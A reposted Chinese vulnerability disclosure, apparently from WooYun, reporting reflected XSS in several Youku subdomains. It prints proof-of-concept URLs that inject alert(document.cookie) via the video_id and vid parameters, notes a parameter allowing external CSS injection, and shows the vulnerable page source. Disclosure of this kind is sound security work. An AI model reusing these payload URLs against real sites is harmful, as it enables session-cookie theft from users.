网站地图    收藏   

主页 > 后端 > 网站安全 >

优酷多个分站多处反射型XSS - 网站安全 - 自学p

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 变量未过滤直接引入至js代码段,优酷某分站多处反射型XSS Video_id 参数未过滤http: comments youku com comments comments?video_id=12321312%27;alert(document cookie);%27bind_type=1pl=6width=0hei...

变量未过滤直接引入至js代码段,优酷某分站多处反射型XSS
 
# Video_id 参数未过滤
 
 
 
http://comments.youku.com/comments/comments?video_id=12321312%27;alert(document.cookie);%27&bind_type=1&pl=6&width=0&height=0&minisite=1&color=1&backurl=http://www.wooyun.org
 
 
 
 
# 两处参数存在问题
 
 
 
http://minisite.youku.com/comments/i.php?vid=%27;alert(document.cookie);%27&pagesize=5000&link=http://www.wooyun.org/css/style.css
 
 
vid 直接代入js代码处


link 参数直接可引用外部CSS
 

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>minisite留言板</title>
<link href="http://static.youku.com/v1.0.0733/index/css/youku.css" type="text/css" rel="stylesheet" />
<link href="http://static.youku.com/v1.0.0733/v/css/play.css" type="text/css" rel="stylesheet" />
<link href="http://www.wooyun.org/css/style.css" type="text/css" rel="stylesheet" /><script type="text/javascript" src="js/minitool.js"></script>
<script type="text/javascript">
    var vid = '';alert(document.cookie);'';
    var pagesize = 5000;
    function topage(vid,page,pagesize)
    {
        jQuery.get('index.php', {'vid':vid,'page':page,'pagesize':pagesize}, function(x){
            var vid = jQuery(x).find('vid').text();
            jQuery('#vid_'+vid+'_comments').html(jQuery(x).find('comment').text());
            jQuery('.vid_'+vid+'_Pager').each(function (){
                jQuery(this).html(jQuery(x).find('pager').text());
            });
        },'xml');
    }
    jQuery(function(){
        topage(vid,1,pagesize);
    });
    function showfaces()

修复方案:

过滤吧

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论